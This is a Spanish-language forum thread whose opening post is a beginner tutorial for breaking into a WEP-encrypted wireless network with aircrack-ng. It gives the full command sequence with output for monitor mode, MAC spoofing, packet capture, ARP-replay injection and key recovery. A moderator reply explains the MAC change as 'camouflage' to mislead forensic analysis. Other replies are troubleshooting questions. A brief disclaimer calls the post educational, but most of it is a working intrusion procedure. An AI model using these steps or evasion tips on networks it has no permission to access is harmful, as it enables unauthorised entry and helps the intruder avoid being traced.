Results 1 to 8 of 8

Thread: Ataque a redes inalambricas con cifrado WEP

  1. #1
    foster04
    Guest

    Default Ataque a redes inalambricas con cifrado WEP

    Buenas Noches a todos,

    El Porque de Este Tutorial (unicamente para principiantes, los demas paciencia jeje)

    Estaba hoy en la oficina pensando en que debia contribuir a la comunidad que tanto me ha ayudado a mi, asi que decidi hacer este mini tutorial para las personas a las que le interese todo lo que es seguridad de redes inalambricas en general.

    En esta oportunidad voy a cubrir unicamente rasgos muy generales de la suite que viene por defecto con Backtrack 4 (aircrack-ng) unicamente ya que cuando hablamos de seguridad de wireless pues es un tema bastante extenso y ustedes deberan leer y buscar informacion de lo que mas le interese.

    Datos Legales

    Este documento es escrtito unicamente con el proposito de orientar a las personas a que realizen las mejores practicas de seguridad posible, del mismo modo que esta destinado a propositos meramente educacionales y por ningun motivo una persona deberia entrar a una red o sistema computacional sin el debido permiso.

    Que es este tool del que voy a hablar:

    Airmon-ng: Es una herramienta que permite poner nuestras tarjetas inalambricas en modo monitor para de esta manera poder hacer "tareas" que de otra forma no serian posibles.

    Aireplay-ng: es una herramienta que nos permite inyectar paquetes a un access point (AP) en este caso un router, para que la capturacion de datos no tome siglos.

    Airodump-ng: es una herramienta que nos permite hacer un "dump" de los paquetes que son enviados a travez del AP, capturaarlos y analizarlos.

    Aircrack-ng: la palabra lo dice todo, es la herramienta que se usa para crackear si ese tesmino aplica, las claves de dichas redes dependiendo de cual sea la situacion.

    Ahora que ya tenemos idea de que es lo que vamos a usar vamos a setear todo.

    Que necesitamos:

    Una laptop con BT4 (live cd o instalado)
    Un AP (router)


    Y bien, supongamos que nuestra red se llama conejo, tiene "encriptacion wep" y queremos entrar. ahora que hacemos???

    Tenemos que hacer varias cosas como lo son:

    - Ver que tarjeta tenemos
    - "bajarla" para poder hacer cambios en la forma en que trabaja.
    - cambiar nuestra mac address por seguridad
    - activar modo monitor en la tarjeta

    Aqui esta una ides de como se debe hacer, al menos a mi me funciona de esta forma

    root@infected:~# airmon-ng


    Interface Chipset Driver

    wlan0 Atheros ath5k - [phy0]
    mon0 Atheros ath5k - [phy0]

    root@infected:~# airmon-ng stop wlan0


    Interface Chipset Driver

    wlan0 Atheros ath5k - [phy0]
    (monitor mode disabled)
    mon0 Atheros ath5k - [phy0]

    root@infected:~# ifconfig wlan0 down
    root@infected:~# macchanger --mac 00:11:22:33:44:55 wlan0
    Current MAC: 00:11:22:33:44:55 (Cimsys Inc)
    ERROR: Can't change MAC: interface up or not permission: Device or resource busy
    root@infected:~# ifconfig wlan0 down
    root@infected:~# macchanger --mac 00:11:22:33:44:55 wlan0
    Current MAC: 00:11:22:33:44:55 (Cimsys Inc)
    Faked MAC: 00:11:22:33:44:55 (Cimsys Inc)
    It's the same MAC!!
    root@infected:~# airmon-ng start wlan0


    Found 2 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!

    PID Name
    10859 wpa_supplicant
    10888 dhclient
    Process with PID 10859 (wpa_supplicant) is running on interface wlan0
    Process with PID 10888 (dhclient) is running on interface wlan0


    Interface Chipset Driver

    wlan0 Atheros ath5k - [phy0]
    (monitor mode enabled on mon1)
    mon0 Atheros ath5k - [phy0]

    root@infected:~#

    Ahora tenemos que "monitorear" los paquetes que van destinados al AP con lo siguiente

    root@infected:~# airodump-ng mon0

    CH 9 ][ Elapsed: 8 s ][ 2010-02-04 20:35

    BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    00:03:2F:28:FD:74 -27 4 2 0 1 54 . WEP WEP conejo

    BSSID STATION PWR Rate Lost Packets Probes

    (not associated) 00:24:2B:B4:6D:6D -75 0 - 1 12 9
    00:03:2F:28:FD:74 00:11:22:33:44:55 0 0 - 1 0 7 conejo

    Y ahora "agarrar" esos paquetes con lo siguiente:

    root@infected:~# airodump-ng -c 1 -w conejo --bssid 00:03:2F:28:FD:74 mon0


    CH 1 ][ Elapsed: 16 s ][ 2010-02-04 20:37

    BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    00:03:2F:28:FD:74 -26 0 16 4 0 1 54 . WEP WEP conejo

    BSSID STATION PWR Rate Lost Packets Probes

    00:03:2F:28:FD:74 00:11:22:33:44:55 0 54 - 1 0

    Ahora, si no sentamos a esperar quela "DATA" llegue a unos 15000 paquetes (minimo requerido para encontrar la clave web" entonces podremos tardar horas en eso, es por eso que aqui viene nuestro querido aireplay-ng a la jugada....

    Asi que lo que tenemos que hacer es lo siguiente: inyectar paquetes al AP para que los IV's (initialization vectors) que es donde se encuentra la clave se generen mas rapido, haciendo lo siguiente:

    root@infected:~# aireplay-ng -1 0 -a 00:03:2F:28:FD:74 -h 00:11:22:33:44:55 -e conejo mon0
    The interface MAC ( 00:11:F5:78:C00 ) doesn't match the specified MAC (-h).
    ifconfig mon0 hw ether 00:11:22:33:44:55
    20:45:02 Waiting for beacon frame (BSSID: 00:03:2F:28:FD:74) on channel 1

    20:45:02 Sending Authentication Request (Open System) [ACK]
    20:45:02 Authentication successful
    20:45:02 Sending Association Request [ACK]
    20:45:02 Association successful :-) (AID: 1)

    root@infected:~# aireplay-ng -3 -b 00:03:2F:28:FD:74 -h 00:11:22:33:44:55 mon0
    The interface MAC (00:11:F5:78:C00) doesn't match the specified MAC (-h).
    ifconfig mon0 hw ether 00:11:22:33:44:55
    20:47:00 Waiting for beacon frame (BSSID: 00:03:2F:28:FD:74) on channel 1

    Aqui tenemos que esperar hasta que la data llegue hasta minimo 15000 paquetes para poder crackearlo...


    CH 1 ][ Elapsed: 4 mins ][ 2010-02-04 21:01

    BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    00:03:2F:28:FD:74 -24 46 247 78575 276 1 54 . WEP WEP conejo

    BSSID STATION PWR Rate Lost Packets Probes

    00:03:2F:28:FD:74 00:11:22:33:44:55 0 48 - 1 114686 194709 conejo
    ^C
    root@infected:~#

    Despues de esto, que tensmos suficientes IVS or DATA entonces vamos a lo ultimo ya que es crackear la password.

    root@infected:~# aircrack-ng -n 128 -b00:03:2F:28:FD:74 conejo-01.cap

    Aircrack-ng 1.0 r1645


    [00:02:32] Tested 1376257 keys (got ********* IVs)

    KB depth byte(vote)
    0 0/ 1 FB(256512) FA(208640) 0A(202240) 16(201984) B5(201984)
    1 0/ 1 00(400384) F8(311552) F7(272640) F6(208896) 07(202240)
    2 0/ 1 FC(597760) F3(335616) F4(310528) F2(272384) 03(202240)
    3 0/ 1 FB(793856) ED(335360) EE(334336) F3(256256) EF(232448)
    4 0/ 1 FA(932608) E7(333568) ED(320000) E8(318976) E9(224000)
    5 0/ 1 F9(1007104) E6(381952) E0(333056) E1(317696) E7(255488)
    6 0/ 1 F8(1019648) DE(395776) D8(380160) DF(317184) D9(316416)
    7 0/ 1 F7(1016064) D5(394496) D6(379392) CF(378112) D7(318720)
    8 0/ 1 F6(1012736) CB(393472) CC(392960) CD(380672) C5(376576)
    9 0/ 22 BD(260608) 82(260096) 86(260096) 88(259840) 8A(259840)
    10 0/ 1 F6(997632) FA(392448) FB(391936) 5A(391168) F9(389888)
    11 0/ 1 0F(994304) 15(393728) 13(391936) 25(391424) 14(390912)
    12 0/ 1 24(884724) 9E(366844) 9C(365888) 9D(365300) 9B(363208)
    Starting PTW attacks with 78575 ivs.
    KEY FOUND! backtracking
    Decrypted Correctly: 100%

    root@infected:~#

    Y esto seria todo por parte de WEP...


    Se aceptan correcciones...Saludos y espero este material haya servido... El siguiente sera el de WPA.....y que conste, es mi primera vez...

  2. #2
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    1

    Default

    armon ng no reconoc mi tarjeta...

    ya hice todos loa pasos previos indicados... debe ser problema de drivers pero nunca he usado linux podrian ayudarme?

    chipset: ATI RS200MB
    tarjeta de red: LAN-Express AS IEEE 802.11g miniPCI Adapter

  3. #3
    Moderator
    Join Date
    Jan 2010
    Posts
    322

    Default

    Hola:

    Puede que esta distribución no sea la mejor para aventurarse con linux por primera vez, el lema de esta comunidad es "esfuerzate" y se refiere a que intentes muchas opciones y variables(e investigación) antes de preguntar algo, lo ideal es que al primer problema no desfallezcas.
    Si encontraste que el problema no eran los drivers, un buen lugar para seguir tu aprendizaje podria ser Aircrack Windows Aircrack-ng Comunidad en Español

  4. #4
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    3

    Default

    muy bien explicado mi estimado foster04, solo una duda cual es el motivo de cambiar la mac de la wireless, digo esto porque lo he hecho sin cambiar la mac y funciona igual

    salu2.

  5. #5
    Moderator
    Join Date
    Jan 2010
    Posts
    322

    Default

    no se trata de funcionalidad el cambio de mac, es un asunto de "camuflaje".
    Eso indica que no basta con tener la direccion "fisica" de un dispositivo en el log, esta no necesariamente representa al equipo "real" que realizo el ataque.(en analisis forense)

  6. #6
    foster04
    Guest

    Default

    Sorry gente, he estado fuera de los foros por 1 mes o algo asi... Gracias a todos x los comentarios, cualquier cosa estamos a la orden.

  7. #7
    Just burned his ISO bichistiko's Avatar
    Join Date
    Aug 2010
    Posts
    1

    Cool Re: Ataque a redes inalambricas con cifrado WEP

    Estos pasos ya los sé de memoria, se agradece obviamente el tutorial, yo por mi parte lo hago en menos pasos. Una duda existe otra manera de obtener las wep's digo desde que ejecutamos el "aireplay" porque creo para algunos desde ahi se les genera el problema. Lo otro hace poco baje el FBI Hacking Wireless que me parece esta basado en Knoppix, yo soy un novato en esto, un autodidacta se podria decir, nunca he estudiado algo con redes o relacionado con la computación, pero siempre me ha gustado saber, he buscado atraves de internet sobre esta herramienta y no he encontrado mucho. Por ahi lei que es mas efectiva que incluso el Backtrack, pero aun no lo he aprendido a usar, a ver si alguien se anima a contarme sus experiencias, les agradezco y a mi compadre por su tutorial por supuesto. Saludos!

  8. #8
    Just burned his ISO
    Join Date
    Aug 2010
    Posts
    2

    Question Re: Ataque a redes inalambricas con cifrado WEP

    Buenas amig@s Bactreros

    TEngo mi siguiente duda yo he intentado de mil formas hacer el mismo procedimiento tal y como esta en el tutorial he inclusive con otros videos.

    Me gustaria saber por que cuando yo inyecto los paquetes solo se me llena de numeros el BEACONS Y del DATA se me queda en 0 (cero) y por esto de no recoger los datos no he podido sifrar la contraseña.

    Saludos y gracias por la ayuda.

    PD: Uso BT4 - Mi metodo es por LIVE CD - Mi tarjeta Wireles es una DLINK de 150mbps - y la reconoce normalmente por live cd pero no por sistema virtual.

    Otra cosita como puedo hacer para que me la reconosca Virtualmente ya que no me muestra ninguna tarjeta Wireles cuando le doy el comando iwconfig.

    Gracias de nuevo.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •